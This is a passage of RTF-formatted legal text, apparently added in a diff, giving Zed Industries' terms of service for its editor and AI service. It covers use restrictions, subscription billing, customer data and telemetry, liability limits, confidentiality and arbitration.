to time.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.4. Restrictions\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer will not (and will not permit anyone else to), directly or indirectly, do any of the following: (a) provide access to, distribute, sell, or sublicense the Service to a third party; (b)\u160 ?seek to access non-public APIs associated with the Service; (c) copy any element of the Service; (d) interfere with the operation of the Service, circumvent any access restrictions, or conduct any security or vulnerability test of the Service; (e) transmit any viruses or other harmful materials to the Service or others;\u160 ?(f) take any action that risks harm to others or to the security, availability, or integrity of the Service except for the purposes of legitimate security or malware research; or (g) access or use the Service or Output in a manner that violates any applicable relevant local, state, federal or international laws, regulations, or conventions, including those related to data privacy or data transfer, international communications, or export of data (collectively, \u8220"{\b Laws}\u8221"), or the Terms.\u160 ?The Service incorporates functionality provided by third-party services, the use of which is subject to additional terms. Customer agrees that if Customer accesses or uses services, features or functionality in the Software or Service that are provided by a third party, Customer will comply with any applicable terms promulgated by that third party, including as set forth at {\field{\*\fldinst{HYPERLINK "/acceptable-use-policies"}}{\fldrslt{\ul +https://zed.dev/acceptable-use-policies +}}} +\u160 ?(as may be updated from time to time). Customer further acknowledges that certain components of the Software or Service may be covered by open source licenses ("{\b Open Source Component}"), including but not limited to Apache License, Version 2.0, GNU General Public License v3.0, and the GNU Affero General Public License v3.0.\u160 ?To the extent required by such open source license for the applicable Open Source Component, the terms of such license will apply to such Open Source Component in lieu of the relevant provisions of these Terms. If such open\u160 ?source license prohibits any of the restrictions in these Terms, such restrictions will not apply to such Open Source Component. Zed shall provide Customer with a list of Open Source Components upon Customer's request.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 3. General Payment Terms\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Accessing certain features and tiers of the Service requires Customer\u160 ?to pay fees. Before Customer pays any fees, Customer will have an opportunity to review and accept the fees that Customer will be charged. Unless otherwise specifically provided for in these Terms, all fees are in U.S. Dollars and are non-refundable, except as required by law.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.1. Price\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed reserves the right to determine pricing for the Service. Zed will make reasonable efforts to keep pricing information published on our pricing page at {\field{\*\fldinst{HYPERLINK "https://zed.dev/pricing"}}{\fldrslt{\ul +https://zed.dev/pricing +}}} +\u160 ?up to date. Zed encourages Customer\u160 ?to check Zed\u8217's pricing page periodically for current pricing information. Zed may change the fees for any feature of the Service, including by adding fees or charges, if Zed gives Customer advance notice of changes before they apply.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.2. Taxes\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer is responsible for any sales, use, GST, value-added, withholding, or similar taxes or levies that apply to Orders, whether domestic or foreign, other than Zed\u8217's income tax (\u8220"{\b Taxes}\u8221"). Fees are exclusive of all Taxes. If Customer is compelled to make a deduction or set-off for any such Taxes, Customer will pay Zed such additional amounts as necessary to ensure receipt by Zed of the full amount Zed would have received but for the deduction.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.3. Authorization\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer authorizes Zed to charge all sums for the orders that Customer makes, the level of Service that Customer selects, and Customer\u8217's submission of prompts or other Customer Data (defined below) to the Service to generate Output (defined below) as described in these Terms or published by Zed, including all applicable taxes, to the payment method specified in Customer\u8217's account. If Customer pays any fees with a credit card, then Zed may seek pre-authorization of Customer\u8217's credit card account prior to Customer\u8217's purchase to verify that the credit card is valid and has the necessary funds or credit available to cover Customer\u8217's purchase.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.4. Subscription Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service may include certain subscription-based plans with automatically recurring payments for periodic charges ("{\b Subscription Service}"). The "{\b Subscription Billing Date}" is the date when Customer purchases its first subscription to the Service. The Subscription Service will begin on the Subscription Billing Date and continue for the subscription period that Customer selects on its account (such period, the "{\b Initial Subscription Period}"), and will automatically renew for successive periods of the same duration as the Initial Subscription Period (the Initial Subscription Period and each such renewal period, each a "{\b Subscription Period}") unless Customer cancels the Subscription Service or Zed terminates it. If Customer activates a Subscription Service, then Customer authorizes Zed or its third-party payment processors to periodically charge, on a going-forward basis and until cancellation of the Subscription Service, all accrued sums on or before the payment due date. For information on the "Subscription Fee", please see Zed\u8217's pricing page at {\field{\*\fldinst{HYPERLINK "https://zed.dev/pricing"}}{\fldrslt{\ul +https://zed.dev/pricing +}}} +. Customer\u8217's\u160 ?account will be charged automatically on the Subscription Billing Date and thereafter on the renewal date of its Subscription Service for all applicable fees and taxes for the next Subscription Period. Customer must cancel its Subscription Service before it renews in order to avoid billing of the next periodic Subscription Fee to Customer\u8217's account. Zed or its third-party payment processor will bill the periodic Subscription Fee to the payment method associated with Customer\u8217's account or that Customer otherwise provides to Zed. Customer\u160 ?may cancel the Subscription Service from the account page at https://zed.dev/account or by contacting us at {\field{\*\fldinst{HYPERLINK "mailto:billing-support@zed.dev"}}{\fldrslt{\ul +billing-support@zed.dev +}}} +. {\b YOUR CANCELLATION MUST BE RECEIVED BEFORE THE RENEWAL DATE IN ORDER TO AVOID BEING CHARGED FOR THE NEXT SUBSCRIPTION PERIOD.}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.5. Consumption Fees\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer\u8217's subscription to the Service may permit Customer to submit prompts or other Customer Data for the purpose of generating Output, at no additional charge for a certain number of times each month. If Customer elects to submit a volume of prompts in excess of the quantity included in its Subscription Fee, then Customer authorizes Zed to charge, and Customer will be charged, a fee for each additional prompt at the rates set forth at {\field{\*\fldinst{HYPERLINK "https://zed.dev/docs/ai/models"}}{\fldrslt{\ul +https://zed.dev/docs/ai/models +}}} +.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.6. Delinquent Accounts\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may suspend or terminate access to the Service, including fee-based portions of the Service, for any account for which any amount is due but unpaid. In addition to the amount due for the Service, a delinquent account will be charged with fees or charges that are incidental to any chargeback or collection of any unpaid amount, including collection fees. If your payment method is no longer valid at the time a renewal Subscription Fee is due, then Zed reserves the right to delete your account and any information or Customer Data associated with your account without any liability to Customer.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 4. Data\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.1. Zed's Use of Customer Data\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer hereby grants Zed a non-exclusive, worldwide, royalty-free, fully paid-up, non-sublicensable (except to service providers and Customer\u8217's designees), non-transferable (except as set forth in Section 15.1) right to use, copy, store, disclose, transmit, transfer, display, modify, create derivative works from, collect, access, store, host, or otherwise process (\u8220"{\b Process}\u8221") any materials that Customer inputs into or otherwise makes available to the Service (including prompts and other written content) (collectively, \u8220"{\b Customer Data}\u8221") solely: (a) to perform its obligations set forth in the Terms, including its Support obligations as applicable; (b) to derive and generate Telemetry (see Section 4.4); and (c) as necessary to comply with applicable Laws. Except as required by applicable Laws, Zed will not provide Customer Data to any person or entity other than Customer\u8217's designees (including pursuant to Section 7) or service providers. In the event that autocomplete suggestions are turned on, Customer understands and agrees that the Service will periodically send Customer Data in the background to an AI Provider for the purpose of generating autocomplete input suggestions in the Services. Autocomplete features can be turned off at any time, in which case Customer Data will not be sent.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.2. Customer's Ownership of Output\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service may generate specifically for, and make available to, Customer text and written content based on or in response to Customer Data input into the Service (collectively, \u8220"{\b Output}\u8221"), including through the use of technologies that incorporate or rely upon artificial intelligence, machine learning techniques, and other similar technology and features. As between the Parties, to the greatest extent permitted by applicable Laws, Customer owns all Output and Zed hereby irrevocably assigns to Customer all right, title, and interest in and to the Output that Zed may possess. {\b For the avoidance of doubt, Zed and its AI Providers will not retain or use Customer Data for the purpose of improving or training the Service or any AI Provider products, except to the extent Customer explicitly opts-in on Zed\u8217's specific feature to allow training and/or such improvement (such as fine-tuning) and is solely for the benefit of Customer.}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.3. Zed's Collection of Output Rating\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service may enable Customer, at its option, to rate or otherwise provide feedback with respect to Output generated through the Service. If Customer opts in to provide feedback concerning Output using the features of the Software or Service (e.g., by clicking an Output rating button), then Customer agrees that Zed may Process that Output and associated Customer Data for the purpose of product development and improvement (\u8220"Output Rating\u8221"). For clarity, Customer\u8217's decision to opt in to provide Output Rating is specific to the corresponding Output. Your decision to provide Output Rating with respect to one instance of Output does not give Zed the right to use any other Output for Output Rating purposes.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.4. Telemetry\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may collect, generate, and Process\u160 ?information, including technical logs, metrics, and data and learnings, related to the Software and Service (\u8220"{\b Telemetry}\u8221") to improve and support the Services and for other lawful business purposes. Customer\u160 ?may configure the Software to opt out of the collection of certain Telemetry Processed\u160 ?locally by the Software itself, but Zed may still collect, generate, and Process Telemetry on Zed\u8217's servers. Zed may not disclose Telemetry to any third-party other than Zed\u8217's Representatives unless it is de-identified so that it does not identify Customer as the source thereof and is aggregated with data across other customers. {\b For avoidance of doubt, Telemetry expressly does not include Customer Data.}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 5. Customer Obligations\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer is responsible for its Customer Data and will comply with applicable Laws when using the Service. Customer represents and warrants that it has obtained all rights, consents, and permissions necessary for Zed to Process Customer Data and exercise the rights granted to it in the Terms without violating or infringing Laws or third-party rights. Customer Data shall not contain: (a) any \u8220"protected health information\u8221" or \u8220"PHI\u8221" as defined under HIPAA (including 45 C.F.R. Parts 160 and 164); or (b) any payment card or cardholder data subject to PCI DSS (including primary account numbers, full track or chip data, CVV/CVC codes, PINs, or similar payment card security data). Customer is solely responsible for ensuring compliance with this restriction and shall be liable for, and shall indemnify Zed against, any claims, fines, or penalties arising from Customer\u8217's breach of this Section. Zed disclaims any and all liability in connection with Customer Data.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 6. Suspension of Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may immediately suspend Customer\u8217's access to any or all of the Service if: (a) Customer breaches Section 2.2 - 2.4 or Section 5; (b)\u160 ?any payments required under the Terms are overdue by 30 days or more; (c)\u160 ?changes to Laws or new Laws require that Zed suspend the Service or otherwise may impose additional liability on Zed in connection with its provision of the Service to Customer; or (d) Customer\u8217's breach of the Terms risks harm to any of Zed\u8217's other customers or the security, availability, or integrity of the Service or other services and entities. Where practicable, Zed will use reasonable efforts to provide Customer with prior notice of the suspension (email sufficing). If the issue that led to the suspension is resolved, Zed will restore Customer\u8217's access to the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 7. Data Sharing and Third-Party Integrations\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 7.1. Collaboration Services\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Certain features of the Service may allow Customer to share data between accounts on the Service, including accounts controlled by persons and entities not associated with Customer (\u8220"{\b Collaboration Features}\u8221"). If Customer elects to use Collaboration Features, Customer acknowledges and agrees that Zed will, and authorizes Zed to, make available Customer Data consisting of file paths, file contents, and metadata regarding the code returned by language servers to the third parties designated by Customer, and that Zed exercises no control over, and has no liability for, the acts or omissions of such third parties (including in connection with the Customer Data).\u160 ?Currently, with the exception of the Channel notes feature, Zed does not persist any shared Customer Data beyond the designated Collaboration Feature session.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 7.2. Third-Party Integrations\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service may support integration with third-party platforms, add-ons, services, or products not provided by Zed (\u8220"{\b Third-Party Platforms}\u8221"). Use of any Third-Party Platforms integrated with or made available through the Service is subject to Customer\u8217's agreement with the relevant provider and not these Terms. Zed does not control and has no liability for Third-Party Platforms, including their security, functionality, operation, availability, or interoperability with the Service. By enabling a Third-Party Platform to interact with the Service, Customer authorizes Zed to access and exchange Customer Data with such Third-Party Platform on Customer\u8217's behalf.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 8. Disclaimers; No Warranties by Zed\par} +{\pard \ql \f0 \sa180 \li0 \fi0 THE SOFTWARE, SERVICE, OUTPUT, AND ALL OTHER ZED SERVICES ARE PROVIDED \u8220"AS IS\u8221" AND \u8220"AS AVAILABLE\u8221". ZED, ON ITS OWN BEHALF AND ON BEHALF OF ITS SUPPLIERS AND LICENSORS, MAKES NO OTHER WARRANTIES, WHETHER EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE, INCLUDING WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, OR NONINFRINGEMENT. ZED DOES NOT WARRANT THAT CUSTOMER\u8217'S\u160 ?USE OF THE SOFTWARE OR SERVICE WILL BE UNINTERRUPTED OR ERROR-FREE OR THAT IT WILL MAINTAIN CUSTOMER DATA WITHOUT LOSS. ZED IS NOT LIABLE FOR DELAYS, FAILURES, OR PROBLEMS INHERENT IN USE OF THE INTERNET AND ELECTRONIC COMMUNICATIONS OR OTHER SYSTEMS OUTSIDE OF ZED\u8217'S CONTROL.\u160 ?ZED IS\u160 ?NOT RESPONSIBLE FOR ANY DAMAGE THAT MAY RESULT FROM THE SOFTWARE OR SERVICE OR OUTPUT OR CUSTOMER\u8217'S\u160 ?DEALING WITH ANY OTHER SERVICE USER. Without limiting the foregoing, Customer\u160 ?acknowledges\u160 ?and agrees\u160 ?that: (a) the Service may produce inaccurate or erroneous Output; (b) Customer is\u160 ?responsible for independently evaluating the Output and any other information Customer\u160 ?receives\u160 ?from the Service; and (c) due to the nature of the Service and artificial intelligence technologies generally, Output may not be unique and other users of the Service may receive output from the Service that is similar or identical to the Output (and, notwithstanding anything to the contrary, such similar or identical output will not be understood to be Output).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 THE LIMITATIONS, EXCLUSIONS AND DISCLAIMERS IN THIS SECTION\u160 ?8 (DISCLAIMERS; NO WARRANTIES BY\u160 ?ZED)\u160 ?APPLY TO THE FULLEST EXTENT PERMITTED BY LAW. Zed does not disclaim any warranty or other right that Zed is prohibited from disclaiming under applicable law.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 9. Term, Termination, and Modification of the Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 9.1. Term\par} +{\pard \ql \f0 \sa180 \li0 \fi0 These Terms are effective beginning when Customer\u160 ?accepts\u160 ?the Terms or first downloads, installs, accesses, or uses\u160 ?the Service, and ending when terminated as described in Section 9.2 (Termination).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 9.2. Termination\par} +{\pard \ql \f0 \sa180 \li0 \fi0 If Customer\u160 ?violates\u160 ?any provision of these Terms, then Customer is\u160 ?not authorized to access the Service and these Terms automatically terminate. In addition, Zed may, at its sole discretion, terminate these Terms or Customer\u8217's\u160 ?account on the Service, or suspend or terminate Customer\u8217's\u160 ?access to the Service, at any time for any reason or no reason, with or without notice, and without any liability to Customer\u160 ?arising from such termination. Customer\u160 ?may terminate its\u160 ?account and these Terms at any time by contacting Zed\u160 ?at {\field{\*\fldinst{HYPERLINK "mailto:hi@zed.dev"}}{\fldrslt{\ul +hi@zed.dev +}}} +.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 9.3. Effect of Termination\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Upon termination of these Terms: a) Customer\u8217's\u160 ?license to access and use the Service will terminate and Customer\u160 ?must immediately cease all use of the Service; b) Customer\u160 ?will no longer be authorized to access its\u160 ?account or the Service; c) Customer\u160 ?must pay Zed any unpaid amount that was due prior to termination; and d) all payment obligations accrued prior to termination and Section(s)\u160 ?2.4 (Restrictions), 3 (General Payment Terms) with the exception of 3.4 (Subscription Service), 4.2\u160 ?(Customer\u8217's Ownership of Output), 4.4 (Telemetry), 8 (Disclaimers; No Warranties by Zed), 9.3 (Effect of Termination), 10 (Ownership; Feedback), 11 (Limitations of Liability), 12 (Indemnity), 15\u160 ?(Governing Law, Dispute Resolution and Arbitration); and 16 (General Terms), will survive. If Customer\u8217's account has been terminated for a breach of these Terms, then Customer is\u160 ?prohibited from creating a new account on the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 9.4. Modification of the Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed reserves the right to modify or discontinue all or any portion of the Service at any time (including by limiting or discontinuing certain features of the Service), temporarily or permanently, without notice to Customer. Zed will have no liability to Customer\u160 ?for any change to the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 10. Ownership; Feedback\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Neither Party grants the other Party any rights or licenses not expressly set out in the Terms. Except as expressly provided in the Terms, as between the Parties, Customer retains all intellectual property rights and other rights in and to the Customer Data and Output. Except for the rights and licenses granted in the Terms, Zed and its licensors retain all intellectual property rights in and to the Service and Software. To the extent Customer provides Zed with feedback (including suggestions and comments for enhancements or new functionality) regarding the Service or Software, Output, or Zed\u8217's products, services, or other technology (\u8220"{\b Feedback}\u8221"), Zed has the full and unrestricted right (but no obligation) to use or incorporate Feedback in any manner, including to improve and develop any of its products, services, technology, or other materials without attribution to Customer.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 11. Limitations of Liability\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.1.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 TO THE FULLEST EXTENT PERMITTED BY LAW, IN NO EVENT WILL THE ZED ENTITIES BE LIABLE TO CUSTOMER FOR ANY INDIRECT, INCIDENTAL, SPECIAL, CONSEQUENTIAL, OR PUNITIVE DAMAGES (INCLUDING DAMAGES FOR LOSS OF PROFITS, GOODWILL, OR ANY OTHER INTANGIBLE LOSS) ARISING OUT OF OR RELATING TO YOUR ACCESS TO OR USE OF, OR YOUR INABILITY TO ACCESS OR USE, THE SERVICE OR ANY MATERIALS OR CONTENT ON THE SERVICE, WHETHER BASED ON WARRANTY, CONTRACT, TORT (INCLUDING NEGLIGENCE), STATUTE, OR ANY OTHER LEGAL THEORY, AND WHETHER OR NOT ANY ZED ENTITY HAS BEEN INFORMED OF THE POSSIBILITY OF DAMAGE.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.2.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 TO THE FULLEST EXTENT PERMITTED BY LAW, THE AGGREGATE LIABILITY OF THE ZED ENTITIES TO CUSTOMER FOR ALL CLAIMS ARISING OUT OF OR RELATING TO THE USE OF OR ANY INABILITY TO USE ANY PORTION OF THE SERVICE, OR OTHERWISE ARISING UNDER THESE TERMS, WHETHER IN CONTRACT, TORT, OR OTHERWISE, IS LIMITED TO THE GREATER OF: \u160 ?THE AMOUNT CUSTOMER HAS PAID TO ZED FOR ACCESS TO AND USE OF THE SERVICE IN THE 12 MONTHS PRIOR TO THE EVENT OR CIRCUMSTANCE GIVING RISE TO THE CLAIM OR US$100.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.3.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 EACH PROVISION OF THESE TERMS THAT PROVIDES FOR A LIMITATION OF LIABILITY, DISCLAIMER OF WARRANTIES, OR EXCLUSION OF DAMAGES IS INTENDED TO AND DOES ALLOCATE THE RISKS BETWEEN THE PARTIES UNDER THESE TERMS. THIS ALLOCATION IS AN ESSENTIAL ELEMENT OF THE BASIS OF THE BARGAIN BETWEEN THE PARTIES. EACH OF THESE PROVISIONS IS SEVERABLE AND INDEPENDENT OF ALL OTHER PROVISIONS OF THESE TERMS. THE LIMITATIONS IN THIS SECTION\u160 ?11 (LIMITATION OF LIABILITY) WILL APPLY EVEN IF ANY LIMITED REMEDY FAILS OF ITS ESSENTIAL PURPOSE.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 12. Indemnity\par} +{\pard \ql \f0 \sa180 \li0 \fi0 To the fullest extent permitted by law, Customer is responsible for its use of the Service, and Customer will defend and indemnify Zed, its affiliates, and their respective shareholders, directors, managers, members, officers, employees, consultants, and agents (together, the "Zed Entities") from and against every claim brought by a third party, and any related liability, damage, loss, and expense, including attorneys' fees and costs, arising out of or connected with: (1) Customer\u8217's unauthorized use of, or misuse of, the Service; (2) the Customer Data; (3) Customer\u8217's use of Output; (4) Customer\u8217's violation or alleged violation of any portion of these Terms, any representation, warranty, or agreement referenced in these Terms, or any applicable law or regulation; (5) Customer\u8217's violation or alleged violation of any third-party right, including any intellectual property right or publicity, confidentiality, other property, or privacy right; or (6) any dispute or issue between Customer and any third party. Zed reserves the right, at Zed\u8217's own expense, to assume the exclusive defense and control of any matter otherwise subject to indemnification by Customer (without limiting Customer\u8217's indemnification obligations with respect to that matter), and in that case, Customer agrees to cooperate with our defense of those claims.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 13. Confidentiality\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.1. Definition\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \u8220"{\b Confidential Information}\u8221" means information disclosed to the receiving Party (\u8220"{\b Recipient}\u8221") under the Terms that is designated by the disclosing Party (\u8220"{\b Discloser}\u8221") as proprietary or confidential or that should be reasonably understood to be proprietary or confidential due to its nature and the circumstances of its disclosure. Zed\u8217's Confidential\u160 ?Information\u160 ?includes the terms and conditions of the Terms and the Service (including any technical or performance information about the Service).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.2. Obligations\par} +{\pard \ql \f0 \sa180 \li0 \fi0 As Recipient, each Party will: (a) hold Confidential Information in confidence and not disclose it to third parties except as permitted in the Terms, including Section 4.1; and (b) only use Confidential Information to fulfill its obligations and exercise its rights under the Terms. Recipient may disclose Confidential Information to its employees, agents, contractors, and other representatives having a legitimate need to know (including, for Zed, the subcontractors referenced in Section 16.5) (\u8220"{\b Representatives}\u8221"), provided Recipient remains responsible for its respective Representatives\u8217' compliance with this Section\u160 ?13 and such Representatives are bound by written agreements (or, in the case of professional advisers like attorneys and accountants, ethical duties) imposing confidentiality and non-use obligations no less protective than this Section 13.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.3. Exclusions\par} +{\pard \ql \f0 \sa180 \li0 \fi0 These confidentiality obligations do not apply to information that Recipient can document: (a) is or becomes public knowledge through no fault of Recipient or its Representatives; (b) it rightfully knew or possessed prior to receipt under the Terms; (c) it rightfully received from a third party without breach of confidentiality obligations; or (d) it independently developed without using Confidential Information.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.4. Remedies\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Unauthorized use or disclosure of Confidential\u160 ?Information\u160 ?may cause substantial harm for which damages alone are an insufficient remedy. Discloser\u160 ?may seek appropriate equitable relief, in addition to other available remedies, for breach or threatened breach of this Section 13, without the \u160 ?necessity\u160 ?of posting a bond or proving actual damages.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.5. Required Disclosures\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Nothing in the Terms prohibits Recipient from making disclosures, including of Customer Data and other Confidential Information, if required by Laws, subpoena, or court order, provided (if permitted by Laws) it notifies Discloser in advance and cooperates in any effort to obtain confidential treatment.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 14. Publicity\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Neither Party may publicly announce that the Parties have entered into the Terms, except with the other Party\u8217's prior consent or as required by Laws. However, Zed may use the name, brand, or logo of Customer (or Customer\u8217's parent company) for the purpose of identifying Customer as a licensee or customer on Zed\u8217's website or in other promotional materials. Zed will cease further use at Customer\u8217's written request.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 15. Governing Law, Dispute Resolution and Arbitration\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 15.1. Governing Law, Jurisdiction and Venue\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Terms are governed by the laws of the State of Delaware and the United States without regard to conflicts of laws provisions that would result in the application of the laws of another jurisdiction and without regard to the United Nations Convention on the International Sale of Goods. The parties further agree that except as stated below in the Arbitration provision, and for any claims under Section 15.2 (b), each party irrevocably consents to the exclusive jurisdiction and venue of the state and federal courts located in New Castle County, Delaware, for any action arising out of or relating to these Terms, and waive any objection based on venue or forum non conveniens. ANY CAUSE OF ACTION OR CLAIM CUSTOMER MAY HAVE ARISING OUT OF OR RELATING TO THESE TERMS MUST BE COMMENCED WITHIN ONE (1) YEAR AFTER THE CAUSE OF ACTION OR CLAIM ACCRUES, OTHERWISE, SUCH CAUSE OF ACTION OR CLAIM IS PERMANENTLY BARRED.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 15.2. Dispute Resolution and Arbitration\par} +{\pard \ql \f0 \sa180 \li0 \fi0 ANY CONTROVERSY OR CLAIM ARISING OUT OF OR RELATING TO THESE TERMS, OR THE BREACH THEREOF, SHALL BE SETTLED BY ARBITRATION AND JUDGMENT ON THE AWARD RENDERED BY THE ARBITRATOR MAY BE ENTERED IN ANY COURT HAVING JURISDICTION THEREOF. IF THERE IS A DISPUTE ABOUT WHETHER THIS ARBITRATION AGREEMENT CAN BE ENFORCED OR APPLIES TO THE DISPUTE, CUSTOMER AND ZED AGREE THAT THE ARBITRATOR WILL DECIDE THAT ISSUE.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b a. Opt-Out.} If Customer does not wish to resolve disputes by binding arbitration, Customer may opt out of the provisions of this Section 17.2 (Dispute Resolution and Arbitration) within 30 days after the date that Customer agrees to these Terms by sending an email to {\field{\*\fldinst{HYPERLINK "mailto:arbitration-opt-out@zed.dev"}}{\fldrslt{\ul +arbitration-opt-out@zed.dev +}}} +\u160 ?or a letter to Zed Industries, Inc., Attention: Legal Department \u8211- Arbitration Opt-Out, 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 that specifies: Customer\u8217's full legal name, the email address associated with Customer\u8217's account on the Service, and a statement that Customer wishes to opt out of arbitration (\u8220"{\b Opt-Out Notice}\u8221"). Once Zed receives Customer\u8217's Opt-Out Notice, this Section 15.2 (Dispute Resolution and Arbitration) will be void and any action arising out of these Terms will be resolved as set forth in Section 15.1 (Governing Law). The remaining provisions of these Terms will not be affected by Customer\u8217's Opt-Out Notice.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b b. Pre-Arbitration Dispute Resolution and Notification.} Prior to initiating an arbitration, Customer and Zed each agree to notify the other party of the dispute and attempt to negotiate an informal resolution to it first. Zed will contact Customer at the email address Customer has provided to Zed; Customer can contact Zed by email at\u160 ?{\field{\*\fldinst{HYPERLINK "mailto:legal@zed.dev"}}{\fldrslt{\ul +legal@zed.dev +}}} +. If after a good faith effort to negotiate, one party feels the dispute has not and cannot be resolved informally, the party intending to pursue arbitration agrees to notify the other party via email prior to initiating the arbitration.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b c. Exceptions to Arbitration.} Customer and Zed each agree that the following claims are exceptions to arbitration and will be brought in a judicial proceeding in a court of competent jurisdiction: (i) Any claim related to actual or threatened infringement, misappropriation or violation of a party\u8217's copyrights, trademarks, trade secrets, patents, or other intellectual property rights; or (ii) Any claim seeking emergency injunctive relief based on exigent circumstances (e.g., imminent danger or commission of a crime, hacking, cyber-attack).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b d. Arbitration Rules.} (1) If Customer is domiciled in the U.S. - Any controversy or claim arising out of or relating to this contract, or the breach thereof, shall be settled by arbitration administered by the American Arbitration Association in accordance with its Commercial Arbitration Rules, and judgment on the award rendered by the arbitrator may be entered in any court having jurisdiction thereof.\u160 ?(2)\u160 ?If Customer is domiciled internationally outside the U.S. - Any controversy or claim arising out of or relating to this contract, or the breach thereof, shall be determined by arbitration administered by the International Centre for Dispute Resolution in accordance with its International Arbitration Rules.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b e. Modification to AAA Rules - Arbitration Hearing/Location.} Customer agrees that any required arbitration hearing will be conducted in the English language by one (1) mutually agreed upon arbitrator, (a) in city/county and state of Customer\u8217's headquarters unless both parties agree otherwise; and appearances may be made via telephonic or video hearing; and (b) for any claim or counterclaim under $25,000, by solely the submission of documents to the arbitrator.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 15.3. Waiver of Jury Trial and Class Action Waiver\par} +{\pard \ql \f0 \sa180 \li0 \fi0 EACH PARTY HEREBY IRREVOCABLY WAIVES ALL RIGHT TO TRIAL BY JURY IN ANY ACTION, SUIT, PROCEEDING, CLAIM, OR COUNTERCLAIM ARISING OUT OF OR 